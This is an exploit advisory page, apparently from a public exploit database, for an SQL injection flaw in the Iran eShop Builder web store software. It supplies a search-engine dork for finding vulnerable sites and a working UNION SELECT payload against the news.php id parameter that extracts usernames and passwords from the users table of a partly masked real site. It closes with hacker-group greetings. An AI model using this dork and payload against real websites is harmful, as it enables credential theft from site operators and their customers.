Iran eShop SQL Injection

2012.04.04
Credit: Mr.XpR
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

>>>>>>>>>> In The Name Of Allah <<<<<<<<<< ============================================================================== [+] Iran eShop Builder Sql Injection Vulnerability ============================================================================== [] Title : Iran eShop Builder Sql Injection Vulnerability [] Generator : Iran eShop Builder [] TestedON : LINUX , Xp , 7 , Vista [] Author : Mr.XpR [] Email : Mr.XpR@att.NeT [] Download : http://www.iriran.net/eshopbuilder [] Date : 2012-1-20 [] Dork : inurl:news.php?id= intext:"Powered by: IRIran.net" ############################################################################## ===[ Exploit ]=== http://www.ebxxxxxxkiran.ir/news/news.php?id=[Sqli] ===[ Demo ]=== http://www.ebxxxxxkiran.ir/news/news.php?id=-1237+union+select+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10+from+data_users-- ===[ We Are : ./Iranian HackerZ ]=== Site : IRaNHaCk.OrG Thanks To : HellBoy , Siamak.Black , GodFather , Saeed.Jok3r , Farbod.Ezrael , UnknowN , Wolf , Samim.s , IrIst , MR.EbI , 313 , ArYaIeIrAn , Parviz Turk , JJHACKER , AL1R3Z4 & all Member in IRaNHaCK.OrG ##############################################################################

References:

http://www.iriran.net/eshopbuilder


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top